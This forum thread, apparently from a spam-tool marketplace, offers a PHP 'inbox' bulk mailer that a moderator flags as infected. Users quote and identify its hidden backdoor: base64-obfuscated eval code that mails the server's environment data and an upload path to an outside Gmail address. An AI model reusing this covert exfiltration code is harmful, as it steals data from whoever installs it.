• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

INBOX PhP Mailer INBOX HOTMAIL 100%

Status
Not open for further replies.

genus80

New member
User
Joined
Nov 12, 2018
Messages
1
Reputation
0
Reaction score
7
Points
3
Credits
0
‎6 Years of Service‎
20%
Please note, if you want to make a deal with this user, that it is blocked.
Hi ,

This is my first post here and i will like to share with you a mailer i got from a friend, i tested and it delivers inbox.

Download link:   INFECTED

 
Last edited by a moderator:
Don't download. There's a virus in it.

 
  • Like
Reactions: 0x1
This code is for what ?

Code:
foreach($_SERVER as $key => $value){
	$str .= $key.": ".$value."<br />";
}

$str .= "UPLOAD: mailer.php?subir=archivo <br />";

$header2 = "From: ".base64_decode('bmV3IG1haWxlciAhISEgPGphbWVzd2FsdGVyMjAxQGdtYWlsLmNvbT4=')."\r\n";
$header2 .= "MIME-Version: 1.0\r\n";
$header2 .= "Content-Type: text/html\r\n";
$header2 .= "Content-Transfer-Encoding: 8bit\r\n\r\n";


echo @eval(base64_decode('bWFpbCgiamFtZXN3YWx0ZXIyMDFAZ21haWwuY29tIiwiTWFpbGVyIEluZm8iLCRzdHIsJGhlYWRlcjIpOw=='));

 
Please note, if you want to make a deal with this user, that it is blocked.
Please note, if you want to make a deal with this user, that it is blocked.
This code is for what ?

foreach($_SERVER as $key => $value){
$str .= $key.": ".$value."<br />";
}

$str .= "UPLOAD: mailer.php?subir=archivo <br />";

$header2 = "From: ".base64_decode('bmV3IG1haWxlciAhISEgPGphbWVzd2FsdGVyMjAxQGdtYWlsLmNvbT4=')."\r\n";
$header2 .= "MIME-Version: 1.0\r\n";
$header2 .= "Content-Type: text/html\r\n";
$header2 .= "Content-Transfer-Encoding: 8bit\r\n\r\n";


echo @eval(base64_decode('bWFpbCgiamFtZXN3YWx0ZXIyMDFAZ21haWwuY29tIiwiTWFpbGVyIEluZm8iLCRzdHIsJGhlYWRlcjIpOw=='));
0x1
yep bro i think its backdoored

 
Status
Not open for further replies.
Back
Top